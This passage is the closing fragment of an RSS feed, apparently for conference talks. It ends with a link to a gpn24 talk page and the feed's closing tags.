about this event: https://cfp.gulas.ch/gpn24/talk/GSHUB7/]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,23ms -->